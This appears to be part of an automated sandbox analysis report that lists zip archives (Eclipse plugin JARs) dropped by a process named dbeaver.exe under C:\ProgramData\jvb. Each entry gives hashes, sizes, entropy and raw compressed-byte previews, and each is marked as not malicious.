      Preview:PK........k.cX................plugin_zh.properties..1.. ......t..S.C..!...5.q........d@....A.u.i......Y;.'$.C.6.i.~kyF........PK.....O...P...PK........k.cX............H...org/eclipse/jface/text/templates/JFaceTextTemplateMessages_zh.propertiese.9..0..{^...s@..R....tc;....|.V...f..h..$.....2.".....L.|x@@.9Fw.*)$Z...........gE.'GAX6.PD...:.[..OZ.#l.._..._FX.X4....E.Ma..Buny.....57.....PK............PK........k.cX............2...org/eclipse/jface/text/RegExMessages_zh.properties.]{w.6..?......8%%..F..'{z...i.l.......)U....~1..H..%...4i...0....`0...9..>....N..H.N6-..q.ZN...!..r9...o.$%.G$..g..h:...|..M..g.B.........g.*.7....,...?...0p.%y>^..e2yQ.SQ.Y.A...,5.^..VQ..~......Va..........m....G.........~SD)..%....<.RD.....D}.....<..z..j....i.......\...c\.v........v#..s..~98...=/p..d.1...V..J...q6.S.x...k....f$..i.#{.E...2..-..J.'..h..r.f`.n?..f.g...T.K!..$...1...4.1R..DtY.....S...s@....T.J.......1.....z....,.3.x:...0.N...\...`...).7.A.E...}.6.2h..6.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1096661
      Entropy (8bit):7.912234516536836
      Encrypted:false
      SSDEEP:
      MD5:40336DD36B219CD005EAAA079DC18158
      SHA1:1DB522881E0A42677E65DC952DAF49C7D1A3EF34
      SHA-256:7FDDFD24A6F42D417F8526B0FD538D4526D7EEFC593806ED1F1977D67A045C73
      SHA-512:0E38B16F59E97C9AF61AF3B997117B9389BBE17AB1C9860A487F406F3EC15943A15648DE64AF7F30FC95DAA31F64776B43877904C5791848DDB041E1B72145AC
      Malicious:false
      Reputation:unknown
      Preview:PK.........WXW................META-INF/MANIFEST.MF....j.6x..}...5..|.$d@..9@.Y.s........,.Y.d*....v....x.Z.z.yE......0....._.X....7...... ...C......Q<..?............?..wo_...+...C.v....~|$....._U.qq....m.2...+.&..Y\...$.].k.O.......!_!..:@ ..A.... ...W6.'6..{~..B..Y|...{=....1SU6..G.M..MY......6n..y......o.|....7..o.6..=...O.|....tM.....N..s{...q........N...uyv.b...j.......]t_...^......N/.......=.+..8..Vy.o..].{q.t...G.p}....k........y......4...T....>.......;...../.....;}.....tQP6...y{.<O.\..}...$..os.../....{w...............=...o...7...9..xk.=_.gon.........6,...{.......w....N..}.+...Z.y....k._.....X.G.o....<+..z.-..66E.....g.8<+......iY.+.?.W.+....&..'?..7.........Y....O..O...Qi.7o.^o.............+....Jw..k...s.....y...}:.b....ok._.....?...1.?....X.Gv.y~...i.U?......G......_Q.U....w.;...o7..>..}x{..;...o....+......?...........?.d.L..NO.r......iy.....C}..|.C.8."......0..p....C[................:..?....ya.........u..^.......n.......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1188819
      Entropy (8bit):7.919072287438148
      Encrypted:false
      SSDEEP:
      MD5:C19646A907F6F2349A724FF0BE100235
      SHA1:3F3A10733A381A52D960A39B40C0F4959E2EE3BA
      SHA-256:6C8CFD9E96D17CE6CD42AC3225B92324170969C9AFFE5D802B59B74B747C534F
      SHA-512:5BA9BA59C65BC86B0F3E0ACAD1D4FA6F2773CA7CC05664D191C80E00459846FDAFABDF12E17CF5886CF52CC97CC8482B761FE4160769D5D900786F60CA21E839
      Malicious:false
      Reputation:unknown
      Preview:PK.........YgW................META-INF/MANIFEST.MF..W..H.?..4.a4....7....H/......#2.......v.^.=.9....l..z..%:E..m..1h.,....w....4....o.........../N.......w.....$.....7....g..Z.g.o..3.?..~Kr.._...........;...e.x..(.......~......M.(...q.........".C.....0..A....k._6...rH...ep...,.:........MU.t.)..:.W/...t.w.=......?~..{./Ok......2....'.......o....&w.n...W.2_..;........8Y...\........ .M........S..X^.)....o..o.e.....?..O~..&u...yD............o........nT.|~...........rc..F.../....A....e.4....^...2.....%......M.}....~..wI...$......w.F...M.?..O{}w..../.].j....?..m..........i.z....k...iA.'M....U.,4.o.]...".?......."...j.l.......M.......&..D./#{e...o...#W?=py..3.?...E9.=s..^....|>.._............|...n.......{c..r.c....xo...C.......;...~.i"..Ut_.[..S.....X.Q.{.,......Z....[-..}F#.......Zg....+.A.x......p.".E.......5.'....G......_q.U.@p....m...g.VeNw...Or.......r..?.|_...............<i.A...mc....Cx..{...N......z....G8H.<...u...}...;.o...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):7663
      Entropy (8bit):7.186800218013655
      Encrypted:false
      SSDEEP:
      MD5:EB3716731F6A8474831F2AB76353CF99
      SHA1:91045994045A498D9F1715AE79A48A78E9FFB6A8
      SHA-256:739887FB653959E167BB39B9281BE4EF9DA7189138E7EF6B799D4B8A975E29D6
      SHA-512:89E6F41F8E486ADAF75631C8573356B4F3AF4AB5EC0A6D8A97EC07A13886F44E943D968D8D3C4394AE0BD4C5F8F2EE761D2AC646327906AE423DA6CBA4A0AFDF
      Malicious:false
      Reputation:unknown
      Preview:PK........j.cX................plugin_fr.propertiesE.1..0.....t...L.K.,}...[.XB...} K...X.R..q......0.BG.b&O.c.X.L..........{8q{..9.#S.}...|..\PK...p'.b...o...PK........j.cX............5...org/eclipse/jsch/internal/core/messages_fr.properties.Q.k.1.~._1.C.z...O.......>..m.n..$.L.;...d.Z9....../..g.6....>....}..n.5...!.A5-..5..S.].:..].}X..D\..e..t.%X..??.U.;u#..m.{...^&........G.b..B.h.+.....X........xc..n...{.cr.&.PX].Z....Rm:K......1x.n.P.[>.|......8.v...<.7...?...(..jsS..&...!.~Y..zo."va........h.bp.QM....c...#.#...\m.A.P.<..$@....,....V....<e.....$.....$.|..\.BUK.~:I..}_]..ch....O..S..;g.u...OPK....U.}...@...PK........j.cX................plugin_es.properties..1.. ....W4q.].......4.PR......r1..jh..4S..D.....Y?..!";LL}...~.<3.7T...../..PK..r...S...V...PK........j.cX............5...org/eclipse/jsch/internal/core/messages_es.properties..MK.A.@.....omQ.PYPD.?.,.T.....N.LF...w.[+*z..d yyI...\.Q....?..^...,q.""4.a2.V.B7@.(D.....N...b......G.N.7..\.."'-.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):44511
      Entropy (8bit):7.89264842911756
      Encrypted:false
      SSDEEP:
      MD5:94DB44B253B15E016D49633514240F29
      SHA1:954D33B8F08273A7A7EA581189C532C76A90E1D7
      SHA-256:D31D613671C47F56F1D98792F12223BD8BF6DC7AF5F0BFFE428743AD43A6E786
      SHA-512:F7AB53BCF1D873A14C3E0C4001C3B03E4055186531F061D92F83DF547974473D333904C585511100498889F755C65C49A76BFA66BB8BA1E86884031D6FED457C
      Malicious:false
      Reputation:unknown
      Preview:PK.........fW................META-INF/MANIFEST.MF.W[s...}OU.C*u..)#7.&...QA@...S0.2.M.....b./...8t.Z...g....`...L3.G.74A]_uRhc.6......`t.N.............ns..F.A.&.k.....%.[H........_I.oPT.y{c.C'..8[.. @I..m.|..)|.P.. .B>.4....;G0.E...h..4.Rovm.Qa.8...E....<#.#....A{&..(rk.4.......1..t..3...U.....y6.......F!|p.Q........F".;.....W7w ..-Hm.?...B.U..;..r..+....".....yE....D.KS.B`...W.2.S..l..7...g0.......S....#..ey(.^....3.T[................Q.#|.3....5.m.8.+..9....I..Ui?/5.8O...S..JiE .. |.c.d.$Y=..S...K.f....z.b|...FT......[..<.6#..q.....R.y...."E.>Tp!..(.".X.f9...Fh..bY.H.p..........2%k$.5.d.I.3.*..+a...&@`g...1l7..ov....7..C..85.e.[jX3....#.m.......uHM{.(.?.V^./..>.......F.9..k.DI.j>n-...l.7;.).l...i..5p. ~.4.....<.44+..t.....!:R}......av..`.U....#x...k 1V..nf..N..K..~......zP.T...8........9..w91..>...PV....0.J./Z..3..@.w.g.z..3......^......C...%..g.3.......=Q.R}:...;@.sL.8.>G.B.h..k..G.b$.Y..\2.)...c........;Ow..*..2.j[..+.....o..f'.+.<-.[e.E.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):22619
      Entropy (8bit):7.8395280021292955
      Encrypted:false
      SSDEEP:
      MD5:40E2EDACAC92D813A5AFC7349EE55DE2
      SHA1:200DA1331D514F24276A02AF184CF362ADD1D317
      SHA-256:619A735DBDE4818A1225BCDBB07EA9772D17DA9104D9CBF1FEAADE1FDF824DDC
      SHA-512:86A706086DD160F9A0201482C6EF6683A9A3429C937A2EC6F75C3204135C18D6EA8415A636966D9222CE4CEAC4246534ECA69FF4DF5F9B8A9CF82CC0D9961E50
      Malicious:false
      Reputation:unknown
      Preview:PK........k.cX................plugin_ru.propertiesM.1..0...._q...6.Q.\..BW.&9.@M.%...k..,....w....8E..>.M...d....+.D.b.... qf.f..2G#?t.o$....VG:....^.I..f.n....}.^ ..2eE...E.Eo....PK...*.}........PK........k.cX............3...org/eclipse/jsch/internal/ui/messages_ru.properties.\[o.F.~. P@h.....%...R,Z...u.}h...F.PGt)..7....8C.;:<#..4A.:.9.....F/..j..f.....|..M.......Z~.-..nV....."/........^.........+[.a...ba'.y...........S....y.Yl>M...'i.9.?3.$.....<z..=;;k....Vv1./.W.ZeH:.I...z.3I.[SD..m.1.x....}....d.V........P..c.[x1qb9...v..{J3`.B..J.+.z.[3.E&.%e.I.F[..h/...'...Q.#....W.A:h..\n[I..M,;`..&..p...ikB.0Q....)E1.d....?8.........g.g...I.i'..t.tq.x.t6...#&"....G,.J./1.._...,..aGT....e....M99Rp\4||$u.@.ci...#;8....d...30"..`...G...{y.$.....M\|.Y.YN<.~.C...K....z.&.y(eR...1....Z..i)Q.P....o..^.x.wK.h..x...C.U..8..|.IQD...........RR.a...~.&..I.x..x.1..^4a2..a(...k.....9......(,....p..\.q....o.-%a...{.x.G.p..z.0....q.....F.......!.....n..s.M!r.z$.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):98416
      Entropy (8bit):7.914668999566852
      Encrypted:false
      SSDEEP:
      MD5:2B5A8C1929D2F03F740F21583DBCF295
      SHA1:0E9451A28BBEC70E28C96840EDAB8E34D2C03917
      SHA-256:3F209C1BB2BD184A49686CBD1A08A5083F718EA2B251C21E25040D9AF89CB774
      SHA-512:EF41D3831F16FF3ED617287BF4BB0B79729366EE26078463EFDD16A992DC0DB2F5BFB4F1EEECD2D0A110C468D9148B0F6DC5AB0A523FCD4EB71102DC8602DD2F
      Malicious:false
      Reputation:unknown
      Preview:PK........I.fW................META-INF/MANIFEST.MF.X[....~OU..Tj.S..Nj..QAQ.E.<.j......~....$....d..z...o]..D..st..,......?....Z.\.p'..Fw..t..fwT..'>.../..%.W.h.b..Yd..^...U%..j.B.p.w....]...Q....|>.gN.......M._x_s/r..Z..(+.K....8./I..........=76.W..go.."..........^.<A..Hd]%.N...,...~.. ....p$.D.0-...?...j..,[>...._...3..}.?_..~..;.7...."B^...%Go.~..*.J...%H..V..&g.a.lf.FOb....-..?D...$.ov.c.k...@S....%T.,......8.a...$P.U...P%q..7...V&.........7i.....m-z.5....A...".d...Lx.l...a.....V.7f[.....0.^...6.P....^........]n.....\.......na....oZ.. ;..Z.._...._..../...{.x.....W.../.sq]......_...B........0...#.d.!.Q..I.,.bL.bl.5q...^.}..].`/.b..}g....Y..o. oc....$=..xN.p..BU:....7..s..i.K..N4mK.>..4+..ev:=~G.\..*.~.Xj..r..Y.pj.\...F...{./......{....c.6.S....n.Y.....T..b:.....u2D.;.4P.c.(.\....;.%|...0......q=u..d..;.?........'J.Ov...6.....Jt..l.....B..Y./n9..k...y.%M.i.V.EN.S3..K.d..(.A...5..De...C...q.g.l...Kv0-.Kf.D...[a.0.[.yg......OO..?.x@/5........P.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):355027
      Entropy (8bit):7.893771394219161
      Encrypted:false
      SSDEEP:
      MD5:577B4FED128196C939D14795ECB6A668
      SHA1:9684FA0BAD195B4C48FA9BA2814F257264261A09
      SHA-256:6FFEB2D0475800EB24E84EEA8344F2AB78CFAD425158D688AAE4272A26183A59
      SHA-512:B537CAB3DB1E99A3EB68EFA9EBF3E9F8BDE832B958426149ED07B0729036BAE220EDFEA7FC42FADF1C9A7F528D73978AC6BFBBC001BC10827B447568784C3A38
      Malicious:false
      Reputation:unknown
      Preview:PK........].fW................META-INF/MANIFEST.MF..I......?f.?...]\...>...hD..$.-.i..&.....UY.U..P..e..ryx.?..G..e..m.e.6mZ....}.../.........P.!,...?I...c......_t....)..u.O......wU.v..E..>..,.".......~..m.5.~._.0r..j.2..V....7a^d._.z....y....?/..........G;....4.?]...............s.../.../.R~...4.OK..lJ7.._.?.f.....P.z..G.$./o3.=w.W.....n.!......w...t.....F..j./..gn......&y..H..._.k......0..i.w...f...v..x.&l...F.._......_.&.t........Q..!..J.?.{..&.Ms7Dy...v.%...H..C?..,..y.... .H...u2..&..Nb}..."]..>m./.....G...-..x.+bx^........W.....W...9=..~.7..I....{.#_!.e.....^...<lOm.....}....?....>.>..[.{<....x.o.{..2.oo..[w.UQ......i..O...@....m..n....rH..,......\..r....._.....e...b......q...t]......I.]...I...........<I....!O...v..?..n..l...\.....#.. ....JK;1....(......=.%.y.!.......A...f...z.N.E.......<.x.t....^.....$Ss2.fH../....m.......F./l.O+..?...m...p.h..C.S..a;b.8.....W,.;..C...u,._G$]cv.|-..4,.....v.....T;{LR.u..?....f..2.MZO.g.)h..>l
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):482291
      Entropy (8bit):7.896383589760986
      Encrypted:false
      SSDEEP:
      MD5:60F8265EFCF4187B9DCE4B76195AAE72
      SHA1:29664EC6BEB7545EA7DD9421D20067FD276A5115
      SHA-256:2CBC1DDF5F108060486A834BF641F2361289FAEF31DAEA68D403FEC681485D05
      SHA-512:6417E4D9BC8D2343FCE05842C5A00459A08C67444EB79A9FFDAC1338579CE8CD78E5642EC90730ECAD94CA52B6F6BF02A7B27A6D97C85DF846B13F77D042D64A
      Malicious:false
      Reputation:unknown
      Preview:PK........l|KW................META-INF/MANIFEST.MF..W..X.6z.F...c....|]8.3..q.^..........#efu.IT....Db....<.md.L......M...............L..Mv....j.$...7.........i.......u..n.........K.?.*.....[....j.O...u.~..>....wU...}.2.}Y~#.OJ.??z....y.....??1.........[{....m..wM..(.N.~..O..}...Aa....1.....{.......................x.].?.m.sw...........4....^.|7O....[.62{....Cu.....*.......O>/.o..g.......1^.....c$i{.mZ..u..H..(. .......H...MZw...b....Q....2....V...~..2.`..J.FzY..}.e..~.6..{M.V}..._./}........WM.....-..y.<:.......$......'......[.z.7.....Vz....H~...o#.9@...G....X..../..d.Nm......Bnw#Kw.^..y_F......6._....>.A....A.....v....;....Y.._...t.ow%../.sa...m..;w=.....e}~.............o.......r.C.Te...?...k......:......|..m...[......I...?A..{.{.G............;......}.o...v....x%.....?......?.W........._.Y.......!.......>..(.Z...!.\...y7{....jHS.&.`..9Xy..._L......~.....?.5....7......e....v.m..z).J..!&.H.V..d..?@..k.W...Z..h.|...kI.9k.I.......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):144098
      Entropy (8bit):7.658009910394749
      Encrypted:false
      SSDEEP:
      MD5:D30235D7BE2B1C3E2C130CB68E2AE69B
      SHA1:B404D0681ACA0E7672022441C25C78E61B59EEEB
      SHA-256:EA4EB8E705CE3278FCF38D61FDB412DFAB73BC938F06CBB9483A9C8E5DC4BD5D
      SHA-512:3B1960B9C3F8B575BD5E4C3825698BEED1B7821F4FE1168CE7CCF84AD240F0B1065098EE10B3B62EDC6520C93E5ABC519534006B380425A2C18B3C2836D9A0FC
      Malicious:false
      Reputation:unknown
      Preview:PK........#?uW................META-INF/MANIFEST.MF.|..Z..{....~...M..;.~.7...(.e@oD.D..GYn......*.......aV..M-h.4....d............!..$..l.}.%i>.C..K2|B..o.`.?+...%..c..kM\%...k.\...+=...>..4q...h.'.$.?.oou.VE..}.}I.....K;...e...AW...u.........a..`.3......];L.OAt.....K4._. .................._..o......Oo..<&.o...>.......X...e.o.../.}{.R$....N.[?..Zp.~......z...~......O....._....J..........;........h.v...vd.NC[&...yj.`*..Z..?.....|=d...>..<D....4.S.OcT....o.4u.o...9../Q[.....uA..O.?WI.D......S...t..........f]Lr./.J..J.A.8..i..(B`D..d..x.F.B.(.......s1$....*..7.cV|I...E5%...........X.....}.............<7.xn8.4..>....v...$Sk.A<..].....%...y..D..1.3WdO.....pZ.R-{=..m.L.A.36)...NH..<.mO.N.^~.o..WI.4...!nF.wH..B...,(fTv..`Y...R...l..mG..4.....B.6.LtH...EmkM..Y%.k.S*....XW.JgqG....d.n<.[Y.2~{..7c...S....d...g......VR.'-V$]..c.W_.G..._..g...k^.7..6..%.....b..].E..I1....%.....m....,......7.@.}-L.v..j.mg;%w.3.(.0....%]...?<.D<S..[....U.v....4c....\..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):257059
      Entropy (8bit):7.97965370130935
      Encrypted:false
      SSDEEP:
      MD5:053CAE75D5FA44001ADCBE4B5CE7D330
      SHA1:00049E5292A157E0F6801F8211AFB2C287EA7E8E
      SHA-256:7EA42A0DB22E3D5B7FFEDA7EC97F2E9995FDD5A2DDCFC2525DB4B5ED759380D8
      SHA-512:C5BBC5DC6BB66DEC8393BF5FB06A7347B85D8ACE98107DAC90215059B17B55D0D1CC4E9A48970A5B9CD3023A0604E74116F7EE4FB998552044006AFD7491DB84
      Malicious:false
      Reputation:unknown
      Preview:PK.........[fW................META-INF/MANIFEST.MF.YY..X.}......=.%.,...........e.w....v...L.vY....yNf^%.G..O{.n.".....?1..Z.}Z..}.@.._...........i.E..$..^z..3..,wS.Iz..uK..+.d./.....W.9..4r...u0..4*.oZ4A4u...mdGi..M;.{..O..)...........<........N...-......../..O......O.i...O..H.......A...W..WuQ...9];.a.>...../...>!..O...+......Ot....y...{u..|.>.x..v<.........q.oA.~..l.A..>......O........O.o..?G+.....o.....g..._.k...cF...?..Y...w......l....n{.w=.@.J...c..Ps........B.].CQ.zu.R..."...={r.5N.....Y.N..4..O..~Bq.i...5...;...>......n2.....~.Sg...m.5]|....G. ....Q..2L.R...=..;.J.!,.|.O...yf...4;d...._...{L....hi.lG.p...z......~WC..:H.._..B.....h/...q..U.^...j..x..)F,u.O...GB.,wY.Ms.}nx1..X4Q.X{i..@.8.....-..Z,..b..Pm].-...c.L......\]te..L.9.W...'....E...2...4r...j{..)JXp{.L.h-E%.EC...G.A....Xf.WV........2Bm...\..".^_e~&.k..7K..I..f......F.......rr.{AK..... $+7#9....c....zGJ..h.{x.!P....^k.-_...o-.UB.Yo5...l.......R.....x...P.u......./N...W.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):49318
      Entropy (8bit):7.703550405303433
      Encrypted:false
      SSDEEP:
      MD5:FEA14CEC08EA0CDC77A0F9E1AB78993B
      SHA1:15D3BAA73258EEC29F0DF1F8EEA48BDD0CE40F28
      SHA-256:81B2B3E40D76C1B05C02B29FFBEB32AC742C9CFF76766E42CBB2B0D551629089
      SHA-512:03792291E5C98323B5F28BAB00CF2FCC267B88913B93B88D8F10BEC79B623DA0C4CC5154FC2D3AFF637404465CF1CFA82CE795D24D96C6C426F52B89540A9152
      Malicious:false
      Reputation:unknown
      Preview:PK.........XfW................META-INF/MANIFEST.MF.YIs.......R.z.[....&u..b......h...I/..mMn.I.I.q.o..Z....[.4{..$.....o`...&......Ff...:..^...V.h......<.......#.....<..0.!.._.f...........l......+.=.U&J...}/NA. .H?...8.hbX.hb...c.....wA..v...Q..n..n.....X.......(...MJ.?..=M..u...(Z.e.....ig..$ M.....U.%.b.[.}.....;..(.a.0.0.../.k.~?...#...s..N....%OA...qc.fu..A...Sc....#.WDhN..*;E...~d..|..)J...'y.y.....>..;.p...0.9.t.x...'./...DC..2`Ef.|D.j...."....t>.P..K`...E..~..x.q..O<.||..x.]...)....C.^`1F~~....IL.L...!._EOcu...x&ro...(C....D}..T......./....]....O4...5_...'...[..8x.l ..s....v. ..L9......f.L..J...K..W.>&.../......C....'......,. ..O....)..}.a?..:Gs...j.oD.......K=......B...:...1.!v...a.=..z.....sp...A...bw..~=o.Dj...|.-.p(....h.....q.......C...<......p.>...>.+a&..x.........>/"bGD.""....Eyb...@.BX.....<.^.|h......un...}.Cw.Q...C.._.P.%6....WsR.b{=.d...Q.....v.+PG.e...(.l..v..q:.0W. ...$.6.ic6......zof...}....z.....|g|....7S..Z.~jv.'.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):14765
      Entropy (8bit):7.927266587392559
      Encrypted:false
      SSDEEP:
      MD5:348B3F5523620157834287465BE3510A
      SHA1:951F72902879B655CDBE96D7A7B3BA7904AA3E3F
      SHA-256:FEC5E3C60A02C4EFF39E8F93798AEB8E8AFDCBB1F7C37DA90A358682AD8CFDD5
      SHA-512:CAC3E3BBAD80FC2DAA35F92C8CD3216E55A55FA7143CB4C742A76DB6918430621ED5BD5B050544B49DAD9DC829EA57B4C8708ED2F98D5D0D81771A77EFDC252A
      Malicious:false
      Reputation:unknown
      Preview:PK........)hdW................META-INF/MANIFEST.MF...n.0...#..P..X.8.r*Q.r..4M..m..^....k.Sc.._S*z.T.@ ...g..{1.B*.G.)....kc.......6...kCAvl.B.P....(c!.o._.M..m.b-.!..Wf.4......4`....{.|.2R.....%).".e.s+.......MlZ..[.a..*o.).,./...Z}G.).*X.....r...+.'a.......mm'eb7.....b.y,="...HS[.*o.O..@..HV.:...G.K[.......R..3.#U...f.D...+W/e.*..YL..._V./.;h.6....z.....Y....g!.G{ ...y........I..."..L@..).B](.[...)..WE...=K..dY.t.T.9.1......lA@L@.#%..0i..J........Q..l..<c.7.[i..He..O......y.....AcZ...p...QA.S:....[..v.....\b.].7/}..V..;mP...J.y>.$..Hy...f..OX..=Q1t.>.[.Uk=...d.....w.3..li.f.[W..p...g.>n.cg.._.S.......Q.7...d....G.....}..&..._uswy.^..._..........j.bF.&....h.U..S.n.XN'.E.X.K....PK........F...PK........)hdW................META-INF/ECLIPSE_.SFu..n.@.E.&...6....H.@.!.4>..ix.0d.Ff...K.j4...9....X....4...K#......H....e$.... H(...&.....l]C.(Sa.s@..G..z.yy.j...a..T....n..q.\..j......(....`%..50n..:.X...$.U.M... .O...(.F....&d.MZ..Q... .0..(.[6*.F.5.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):1541681
      Entropy (8bit):7.920984090766123
      Encrypted:false
      SSDEEP:
      MD5:FDD648A1E02C9A7526C91B07D16757E8
      SHA1:70D593E3514FEE58AB0BF71C61A0CD60D2706D8D
      SHA-256:9FA6FCD4AC17AED1F70EFD4AF6863D7E9C12D51F537FE959AB4DBE26CF823B46
      SHA-512:398ADD5960E760C4F2D91570CE2C055197A7E85D73EBB46E16ACD0C8460680BE1A286FECDC3FD834CA9DE195DDFAD2819E19916838CDC74039353504D5C8DC67
      Malicious:false
      Reputation:unknown
      Preview:PK........|HkW................META-INF/MANIFEST.MF..Y..Z.......V......Y..D.y"TPA*.Px..R.RH..._..z..y...V..z.........E..j.&.......o..6J..k.............;.........E.G._...%e...l6|.X......k.....j.4/...Sh..?.Hs..}..........WI...o.2.2......X.?......o.|....{.%?).<1.wM.|...y.Re.x.>W~.6......J.........*..:....;...u..O..-=}Z...?.....z...&..'v..m..........0k..".........W"~.~.'..w....>.......v#Ei.e..&..}...`o>.iX\I....7/...]........d......e.......m.[......}X..m.......u.....x..'.S.}K_....o4.6.}....o..-..uw.{Y..^g.....^.JnG.aF.....;0}K...t`>5...v.....y..w..F..V...w.....o......_.y..M}>.e....C}m-J.~...o...oY..C.N..GO.Q....~2c.....n..G..'c`a.g.yz........j.._......;....L..T.~.~8...x^.....U&.<.....s..<.o..|.G.Y...a..vr.n..?M~...w.S.$....f.=*..x.~.....p.C.CK'...xx.......K{..?8...U~.#..............p...F.|ye.}*oL.gi....."....c8...Q....]Wh..W..'..&X.?qK>..b'.?O.xX..R....@W.w_h...O|..p{i1.*.O..xn......-.<.2.........`g...ysg..S%. d?......f.R.e.#....g...d>xv..)...=..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):13228
      Entropy (8bit):7.894988470366298
      Encrypted:false
      SSDEEP:
      MD5:06210FA06692D1D072C6062500F7D1B8
      SHA1:1663DC1B135901C70E72ECB81237D7283D6A7EF4
      SHA-256:53A79B5CE909920F196F6DA1DE1D10ABD81B71B838B30FB6A764EB5E888F7F38
      SHA-512:EF58DD2C33BF73ABFA0D3570976AC79CBD4D7E55151B23A5F263A627702FBDE133B234A442DD6D217BA1CC73F5AB5EB8CDBFC1E79C049343295401E0BFF6E9E7
      Malicious:false
      Reputation:unknown
      Preview:PK........b5.W................META-INF/MANIFEST.MF}.]s.0....?0.....x..V.P..w!..1........m..p..s.....F...y.yF.6.tE...8..#y|.H.(0.,.#R`......k.P$..Q.R..k.s.!.e.yE...b<.~.4..;.\3.)..J.".!%i.......R,*.H...k.....M)..h...k_..J..3O..0..{.@@I..;.".. .{jy.W.BAy.../.d/.9.k.`....@.`<...DB..@U.s...Lb.c&9.@..?..5.2.gL.b.* .9..H.R..)...i.b..I8S.x.......o.4.......i>..:..k.gv}.CZ.d..ot{F.G..M...5.k...?.R..b....5oj..m.V..H}.d.......&>.....{(^....w.s.Z.n.....F"...n.{.R8...L..y.....HM!..u...e.-.n...[..u".q..9iO}...s.:A.NV.....!..k././.......O..A[......9.-.q...M"?...^......._..;k.J..[.QX=.`#...o>d..,.6>....w.:.....y..c.......#..K:...X.2.r.u..~..|..%-W:jBge..w..PK...-}.}...0...PK........c5.W................META-INF/ECLIPSE_.SF}...@...%...D.6`..KY....?..f...f..i...>(.B..U-N..9.YG......-9q*.G&.1.)o<.A?.J"..J*HZ..)&.v....u^..~.s.2~.#..a.a.X.I.q..6AZkh..*ck.4y{d...>.A.|.'...x.1.....S..y....D..J."sR....l..^..W....x3.<....,...;6%..@...;{...J..;W...?..#.>.K'...2>
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):61997
      Entropy (8bit):7.882915391518124
      Encrypted:false
      SSDEEP:
      MD5:1AA4DD8200DD0A71E4CF13A5D3BFF518
      SHA1:EDF1B71D299423717FD1A83C3718B082E68669A8
      SHA-256:AF780A0B3F6FC6E76FDE64A27C0F24D92AB969106EB080B7C8E17C2F9907C048
      SHA-512:C45668DC5CF5591E319F4CB402137944B6E5711F89CDF21C1FA21699A3F4F7D9A0D1E6D00C1E36B3FF9C2BB62E295E33AF5EBDEAFB3A0709DD8455CFF7A6C9E2
      Malicious:false
      Reputation:unknown
      Preview:PK........ZN5W................META-INF/MANIFEST.MF.X.n..}o..!.z.....N#.........EQ..}...Rq...D.c..`...sX<U,F..c.$m.P.8..pGv...1.)2...N.9....N..;...+.....qn.!....|.Em...K.mj.<.p.G.f............+... .:a.:.......}K..rQ..>.q......^'...&...&.4..L....4.?Dp...>p..:.............5a.!.\....F..G...c..O.\.........|.<*. N.2.g`5o...2....?.].T....D......?r...K..f.....,.:......O..2'F.kP...g.8.S.C..k....>....P....gL..{.....%A.C.|dM2..4}.\.t\.TI....d....{..z.=.&6........W.&.X.X..t..x>..!.~...zw.&............8.=..ws..u..Y....J.m)0...m.'V.u..>._A8.....p.@..r..;M.....L.f^..S;tAj.q=..^...u2..M.. ...L..<..z.....{....&.a8.Ig.#.S.....:..a...g.....X..I..s..>....m.L.W..kNtk.n.....zl....N.9v......ThS,........8.W..N.IQ...'B....\.&..f.....m=~gq-...s.{...GK.re_..D..&e...<..Z..\-R...}.N.Vc.n...5mk.l.Q...(%.!.j.. ...YD....f.z3.x....../A..g..!.Z1...6..,...Clcq.b....e1."c..O.y..o&....(.K."5.....J.$.D(....y6l.....V]....i{. ......n..5N;'qj..G0.y.O. ......q+...R......a.P
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):62572
      Entropy (8bit):7.936935438521847
      Encrypted:false
      SSDEEP:
      MD5:F0565BEFE2ED5BA32B3552DDD0EBA72F
      SHA1:EE7C09D665F2C8EC2774CE556945C4B09DBE2C57
      SHA-256:C0DE25579916CFA5AE3791B41B1665903A7000E476D92E03A13CDADC69C3F48F
      SHA-512:63BF59047BF396CF3D66641335DFE75BAD24A14D9748BB45842B153363510E00FCFB4207BE4C28810B5558B98D87376120A01BF453BF3C2D2D0BEB444BF96A9B
      Malicious:false
      Reputation:unknown
